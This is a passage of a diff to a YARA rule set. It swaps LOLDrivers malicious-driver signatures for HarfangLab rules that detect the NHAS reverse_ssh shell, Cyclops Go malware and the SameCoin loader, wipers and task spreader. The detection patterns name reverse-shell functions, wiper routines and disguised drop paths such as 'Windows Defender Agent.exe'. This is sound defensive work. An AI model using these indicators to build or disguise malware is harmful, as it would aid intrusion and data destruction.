+		$a6 = "<|BB-AMARELO|>" wide fullword
+		$a7 = "<|BB-AZUL|>" wide fullword
+		$a8 = "<|BB-PROCURADOR|>" wide fullword
+		$a9 = "<|ITAU-SNH-CARTAO|>" wide fullword
+		$a10 = "<|ITAU-TK-APP|>" wide fullword
+		$dga = { 76 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 78 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 7A 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 77 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 6B 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 79 00 00 00 }
 
 	condition:
-		all of them
+		$dga and ( 4 of ( $a* ) )
 }
-rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Ntbiosys_Microsoftrwindowsrntoperatingsystem_C0D8
+rule HARFANGLAB_Nhas_Reverse_Shell_Unpacked_Large : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - ntbios_2.sys"
-		author = "Florian Roth"
-		id = "f16b4b22-985a-5d39-ae51-709aa9a69d8d"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L521-L541"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c"
-		hash = "96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc"
-		logic_hash = "74ad0b57644d82a77bc902786250156f5e3700671bdf9765055b5908dc345a67"
-		score = 70
+		description = "Matches unpacked NHAS reverse_ssh file samples"
+		author = "HarfangLab"
+		id = "7d910d10-49a1-5fb5-b5bd-49155413c433"
+		date = "2024-09-24"
+		modified = "2025-04-16"
+		reference = "TRR250201"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L254-L275"
+		license_url = "N/A"
+		hash = "18556a794f5d47f93d375e257fa94b9fb1088f3021cf79cc955eb4c1813a95da"
+		logic_hash = "eedbf91f9ea7607dc68126840da338035b48509c5649a89f490d8cdfb32844b2"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006e007400620069006f00730020006400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002c00200030002c00200032002c00200031 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002c00200030002c00200032002c00200031 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e007400620069006f002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0020004d006900630072006f0073006f00660074002800520029002000570069006e0064006f0077007300200028005200290020004e00540020004f007000650072006100740069006e0067002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e007400620069006f0073002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]7248674362406709002000280043002900200032003000300033 }
+		$s1 = "/NHAS/reverse_ssh/cmd/client" ascii
+		$s2 = "/handlers.runCommandWithPty" ascii
+		$s3 = "/connection.RegisterChannelCallbacks" ascii
+		$s4 = "/internal.RemoteForwardRequest" ascii
+		$s5 = "github.com/pkg/sftp" ascii
+		$s6 = "github.com/creack/pty" ascii
+		$s7 = "main.Fork" ascii fullword
 
 	condition:
-		all of them
+		filesize > 2MB and filesize < 30MB and ( ( uint32be( 0 ) == 0x7F454C46 ) or ( uint16be( 0 ) == 0x4D5A ) ) and ( 5 of them )
 }
-rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Wintapixsys_Microsoftwindowsoperatingsystem_8578
+rule HARFANGLAB_Nhas_Reverse_Shell_Pe_Inmem_Large
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - WinTapix.sys, SRVNET2.SYS"
-		author = "Florian Roth"
-		id = "0bb182e8-e64b-5b01-9ca5-105212ebeb51"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L544-L564"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330"
-		hash = "1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e"
-		logic_hash = "dd85f0dc471425fe692e5a51580a97facdaea45505c48b5e01dd6dbc975f2ffe"
-		score = 70
+		description = "Matches packed NHAS reverse_ssh PE samples in-memory during execution"
+		author = "HarfangLab"
+		id = "f6b38e11-c405-5623-bea3-3a8d96b435af"
+		date = "2024-09-24"
+		modified = "2025-04-16"
+		reference = "TRR250201"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L276-L294"
+		license_url = "N/A"
+		hash = "7798b45ffc488356f7253805dc9c8d2210552bee39db9082f772185430360574"
+		logic_hash = "b9bbbbd93dc39f8c16c7f8275fa73f4c345c3ba8f21da76ae491e89d3a22c473"
+		score = 75
 		quality = 80
 		tags = ""
+		context = "memory"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570069006e0064006f007700730020004b00650072006e0065006c00200045007800650063007500740069007600650020004d006f00640075006c0065 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0033002e0039003600300030002e003100360033003800340020002800770069006e0062006c00750065005f00720074006d002e003100330030003800320031002d00310036003200330029 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0033002e0039003600300030002e00310036003300380034 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00570069006e00540061007000690078002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f0066007400ae002000570069006e0064006f0077007300ae0020004f007000650072006100740069006e0067002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00570069006e00540061007000690078002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$s1 = "\\rprichard\\proj\\winpty\\src\\agent\\" ascii
+		$s2 = "\\Users\\mail\\source\\winpty\\src\\" ascii
+		$s3 = "Successfully connnected" ascii
+		$s4 = "*main.decFunc" ascii fullword
+		$s6 = "keepalive-rssh@golang.org" ascii fullword
+		$s7 = ".(*sshFxpSetstatPacket)." ascii
 
 	condition:
-		all of them
+		( all of them )
 }
-rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Usbxhcisys_Microsoftwindowsoperatingsystem_290B
+rule HARFANGLAB_Nhas_Reverse_Shell_Elf_Inmem_Large
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_290bc782.sys"
-		author = "Florian Roth"
-		id = "aa50e42c-7b09-535d-9c2c-e9e11872e695"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L567-L586"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "290bc7822da41f0b5580b27c8d14a2a5c3fbe3e4b6921957b134efc6beeb0aeb"
-		logic_hash = "6153c594c5b261644e1ed03f4187227af0bdf16ad5576a7df431e07a28b73432"
-		score = 70
+		description = "Matches packed NHAS reverse_ssh ELF samples in-memory during execution"
+		author = "HarfangLab"
+		id = "cd6f7b81-b8df-5e2b-9da6-981d1f62c131"
+		date = "2024-09-24"
+		modified = "2025-04-16"
+		reference = "TRR250201"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L295-L312"
+		license_url = "N/A"
+		hash = "9f97997581f513166aae47b3664ca23c4f4ea90c24916874ff82891e2cd6e01e"
+		logic_hash = "54ba4fc366fb6e4a252d51528ede3ec418b369881ad98e9119d1a9650b6a1bab"
+		score = 75
 		quality = 80
 		tags = ""
+		context = "memory"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005500530042002000580048004300490020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0032002e0039003200300030002e003200320030003900390020002800770069006e0038005f006c00640072002e003100370030003200310032002d00300036003000300029 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0032002e0039003200300030002e00320032003000390039 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0075007300620078006800630069002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f0066007400ae002000570069006e0064006f0077007300ae0020004f007000650072006100740069006e0067002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0075007300620078006800630069002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$s1 = "/NHAS/reverse_ssh/cmd/client" ascii
+		$s2 = "/handlers.runCommandWithPty" ascii
+		$s3 = "/connection.RegisterChannelCallbacks" ascii
+		$s4 = "/internal.RemoteForwardRequest" ascii
+		$s7 = "main.Fork" ascii fullword
 
 	condition:
-		all of them
+		( all of them )
 }
-rule LOLDRIVERS_MAL_Driver_Basil_Windivertsys_Windivertdriver_8DA0
+rule HARFANGLAB_Charmingkitten_Cyclops : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - windivert.sys"
-		author = "Florian Roth"
-		id = "b2c5b02b-7fe2-5dcc-8c96-c67212780220"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L589-L610"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "8da085332782708d8767bcace5327a6ec7283c17cfb85e40b03cd2323a90ddc2"
-		hash = "2f43f4251be4d72dd56c91bf6cce475d379eb9ba6c4dda2be3022ea633d5e807"
-		hash = "8248306bcc5fae20fd4f3d5c44f962c85cddbe020b34a1799350ce2034154b7d"
-		logic_hash = "ec4c9f576f33bdb22610fb9f4462b7a6c113ad704b1f6908e949dc65dde28bd5"
-		score = 70
+		description = "Detects Cyclops Golang Malware"
+		author = "HarfangLab"
+		id = "2cc7b2ff-25ca-5eac-a607-c3ee5136e0aa"
+		date = "2024-08-05"
+		modified = "2025-04-16"
+		reference = "TRR240801"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L313-L333"
+		license_url = "N/A"
+		hash = "fafa68e626f1b789261c4dd7fae692756cf71881c7273260af26ca051a094a69"
+		logic_hash = "70ab3f44b6889d478a94dc6aefcd30f0e82e0b80bcf26921167b72f35bdb7fa8"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400680065002000570069006e00440069007600650072007400200032002e003200200064007200690076006500720020005b00550052004c003a002000680074007400700073003a002f002f0072006500710072007900700074002e006f00720067002f00770069006e006400690076006500720074002e00680074006d006c005d0020005b0042006900740063006f0069006e003a00200031004300350076005a0056005300620069007a00500065005a00380079006400540059006800550066006d0034004c004100320063004e007700420066006300590068005d }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0042006100730069006c }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0032 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0032 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00570069006e004400690076006500720074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00570069006e00440069007600650072007400200032002e00320020006400720069007600650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00570069006e004400690076006500720074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a900200042006100730069006c00200032003000310031002d0032003000320032 }
+		$go = " Go build ID: \"" ascii
+		$a1 = "dep\tback-service\t(devel)" ascii fullword
+		$a2 = "/brain-loader-enc.go\x00" ascii
+		$a3 = "back-service/go-mux/api" ascii
+		$a4 = "/JD-M42KItJncJfqb38qh/" ascii
 
 	condition:
-		all of them
+		filesize > 2MB and filesize < 20MB and ( uint16( 0 ) == 0x5A4D ) and $go and ( 2 of ( $a* ) )
 }
-rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Wantdsys_Microsoftwindowsoperatingsystem_E7AF
+rule HARFANGLAB_Samecoin_Campaign_Loader : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - wantd_6.sys"
-		author = "Florian Roth"
-		id = "5f883209-6887-5cb4-96bb-988898d47c09"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L613-L635"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e"
-		hash = "b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3"
-		hash = "8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce"
-		hash = "06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4"
-		logic_hash = "b4d12069a9a3a8d8d9bde9a4ed3f80f21f2654b6f96943d201933198678d01d9"
-		score = 70
+		description = "Matches the loader used in the SameCoin campaign"
+		author = "HarfangLab"
+		id = "ab4d59f6-300d-5cdf-b91f-87f8cc1f0eac"
+		date = "2024-02-13"
+		modified = "2025-04-16"
+		reference = "TRR240201"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L334-L354"
+		license_url = "N/A"
+		hash = "cff976d15ba6c14c501150c63b69e6c06971c07f8fa048a9974ecf68ab88a5b6"
+		logic_hash = "7df04ab208d2caa5a137b1c3481ef734df54bbe8330979f524b16e9ba8cf48d5"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570041004e0020005400720061006e00730070006f007200740020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e0031003100370032 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e0031003100370032 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00770061006e00740064002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f00660074002000570069006e0064006f007700730020004f007000650072006100740069006e0067002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00770061006e00740064002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$hebrew_layout = "0000040d" fullword ascii
+		$runas = "runas" fullword ascii
+		$jpg_magic = { FF D8 FF E0 00 10 4A 46 49 46 00 01 }
+		$wl_1 = "C:\\Users\\Public\\Microsoft Connection Agent.jpg" ascii
+		$wl_2 = "C:\\Users\\Public\\Video.mp4" ascii
+		$wl_3 = "C:\\Users\\Public\\Microsoft System Agent.exe" ascii
+		$wl_4 = "C:\\Users\\Public\\Microsoft System Manager.exe" ascii
+		$wl_5 = "C:\\Users\\Public\\Windows Defender Agent.exe"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and filesize > 5MB and filesize < 7MB and $hebrew_layout and $runas and $jpg_magic and 3 of ( $wl_* )
 }
-rule LOLDRIVERS_MAL_Driver_Chingachgukdengerk_Vusbbussys_Virtualusbbusdriver_B4F3
+rule HARFANGLAB_Samecoin_Campaign_Wiper : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_b4f33ffe.sys"
-		author = "Florian Roth"
-		id = "68298157-58f2-51de-b534-f86bdefe00a6"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L638-L657"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "b4f33ffef069c18e8a8834eb448dd1f1dbdaae93b140cfff5a1db015eb3ada2f"
-		logic_hash = "00c68cc29903f0a92d8ff711ab539c97033ba03efa5f895005da925db897bdd8"
-		score = 70
+		description = "Matches the wiper used in the SameCoin campaign"
+		author = "HarfangLab"
+		id = "695e9181-cc96-5212-b33c-4d55065b7b85"
+		date = "2024-02-13"
+		modified = "2025-04-16"
+		reference = "TRR240201"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L355-L373"
+		license_url = "N/A"
+		hash = "e6d2f43622e3ecdce80939eec9fffb47e6eb7fc0b9aa036e9e4e07d7360f2b89"
+		logic_hash = "ebe7c90398464ecf74ede17551c2ebc58b851ba6502092320934d1f5353581a2"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c002000550053004200200062007500730020006400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004300680069006e006700610063006800670075006b00200026002000440065006e0067006500720032006b }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0030002e00310020006200750069006c0074002000620079003a002000570069006e00440044004b }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0030002e0031 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0076007500730062006200750073002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005600690072007400750061006c002000550053004200200062007500730020006400720069007600650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0076007500730062006200750073002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900320030003000340020004200790020004300680069006e006700610063006800670075006b00200026002000440065006e0067006500720032006b }
+		$code = { 68 57 04 00 00 50 E8 }
+		$wl_1 = "C:\\Users\\Public\\Microsoft Connection Agent.jpg" ascii
+		$wl_2 = "C:\\Users\\Public\\Video.mp4" ascii
+		$wl_3 = "C:\\Users\\Public\\Microsoft System Agent.exe" ascii
+		$wl_4 = "C:\\Users\\Public\\Microsoft System Manager.exe" ascii
+		$wl_5 = "C:\\Users\\Public\\Windows Defender Agent.exe" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and filesize < 200KB and $code and 3 of ( $wl_* )
 }
-rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_30E0
+rule HARFANGLAB_Samecoin_Campaign_Tasksspreader : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "888de0dc-5643-5e55-8272-9363cc55bfcf"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L660-L680"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "30e083cd7616b1b969a92fd18cf03097735596cce7fcf3254b2ca344e526acc2"
-		hash = "a906251667a103a484a6888dca3e9c8c81f513b8f037b98dfc11440802b0d640"
-		logic_hash = "e2c964f7e30da210778e8a2e5bb96d53485a0736cf3ff28bccbefacb6b46765a"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Detect .NET Task Scheduler that is dropper by SameCoin Loader"
+		author = "HarfangLab"
+		id = "7dcfdecd-00c3-502a-b29e-a10a1fd9543f"
+		date = "2024-02-13"
+		modified = "2025-04-16"
+		reference = "TRR240201"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L374-L411"
+		license_url = "N/A"
+		hash = "b447ba4370d9becef9ad084e7cdf8e1395bafde1d15e82e23ca1b9808fef13a7"
+		logic_hash = "61d602c343365608e5bc587ee9c7898e256f2411d78c7fe74c211e68bf4ab707"
+		score = 75
+		quality = 53
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310033002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$dotNet = ".NETFramework,Version" ascii fullword
+		$a1 = "System.DirectoryServices.ActiveDirectory" ascii fullword
+		$a2 = "GetTypeFromProgID" ascii fullword
+		$a3 = "DirectorySearcher" ascii fullword
+		$a4 = "SearchResultCollection" ascii fullword
+		$a5 = "UnaryOperation" ascii fullword
+		$b1 = "$dc1b29f0-9a87-4383-ad8b-01285614def1" ascii fullword
+		$b2 = "Windows Defender Agent" ascii fullword
+		$b3 = "Windows Defender Agent.exe" wide ascii fullword
+		$b4 = /(\\)?C(:|\$)\\Users\\Public\\Microsoft System Agent\.exe/ wide fullword
+		$b5 = "MicrosoftEdgeUpdateTaskMachinesCores" wide fullword
+		$b6 = "WindowsUpdate" wide fullword
+		$c1 = "RegisterTaskDefinition" wide fullword
+		$c2 = "DisallowStartIfOnBatteries" wide fullword
+		$c3 = "StopIfGoingOnBatteries" wide fullword
+		$c4 = "Schedule.Service" wide fullword
+		$c5 = "\\Domain Users" wide fullword
+		$c6 = "(objectClass=computer)" wide fullword
 
 	condition:
-		all of them
+		filesize > 8KB and filesize < 40KB and ( uint16be( 0 ) == 0x4D5A ) and $dotNet and ( 4 of ( $a* ) ) and ( ( ( any of ( $b* ) ) and ( any of ( $c* ) ) ) or ( all of ( $c* ) ) )
 }
-rule LOLDRIVERS_MAL_Driver_Pinchinstechnologycoltd_Rwtkrlsys_Ransomwareterminator_090D
+rule HARFANGLAB_Samecoin_Campaign_Nativewiper : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_090d409f.sys"
-		author = "Florian Roth"
-		id = "5c1070f6-a282-5cee-b9bc-ea833b766e1f"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L683-L703"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "090d409f86430e078694e621ad0bd5e458d32aa727f0eb99bda3961577df8d49"
-		hash = "04e1f364c0fcebaa1f0833c0595a976d0625ed3390441b4f2d1aedb314bf2497"
-		logic_hash = "079ccac2c3427b198a0873ee69ab4ce8631a4b35fa3829468883a0acf2852b94"
-		score = 70
+		description = "Matches the native Android library used in the SameCoin campaign"
+		author = "HarfangLab"
+		id = "9c77c26e-50f7-5ee4-bc6b-c0333e268b2c"
+		date = "2024-02-13"
+		modified = "2025-04-16"
+		reference = "TRR240201"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L412-L432"
+		license_url = "N/A"
+		hash = "248054658277e6971eb0b29e2f44d7c3c8d7c5abc7eafd16a3df6c4ca555e817"
+		logic_hash = "2779664830df3b5be72b7fe7d4da3d27e2a86b289ee3974596abf1df12317cd8"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005200570054004b0072006c }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e003800300037 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00520061006e0073006f006d0077006100720065005400650072006d0069006e00610074006f0072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310036002000500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
+		$native_export = "Java_com_example_exampleone_MainActivity_deleteInCHunks" ascii
+		$f1 = "_Z9chunkMainv" ascii
+		$f2 = "_Z18deleteFilesInChunkRKNSt6__" ascii
+		$f3 = "_Z18overwriteWithZerosPKc" ascii
+		$s1 = "/storage/emulated/0/" ascii
+		$s2 = "FileLister" ascii
+		$s3 = "Directory chunks deleted."
+		$s4 = "Current Chunk Size is:  %dl\n" ascii
 
 	condition:
-		all of them
+		filesize < 500KB and uint32( 0 ) == 0x464C457F and ( $native_export or all of ( $f* ) or all of ( $s* ) )
 }
-rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Wantdsys_Microsoftwindowsoperatingsystem_6908
+rule HARFANGLAB_Supposed_Grasshopper_Downloader : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - wantd_2.sys"
-		author = "Florian Roth"
-		id = "3bd8b888-8170-5da6-ba1c-f13c1ca27e6f"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L706-L725"
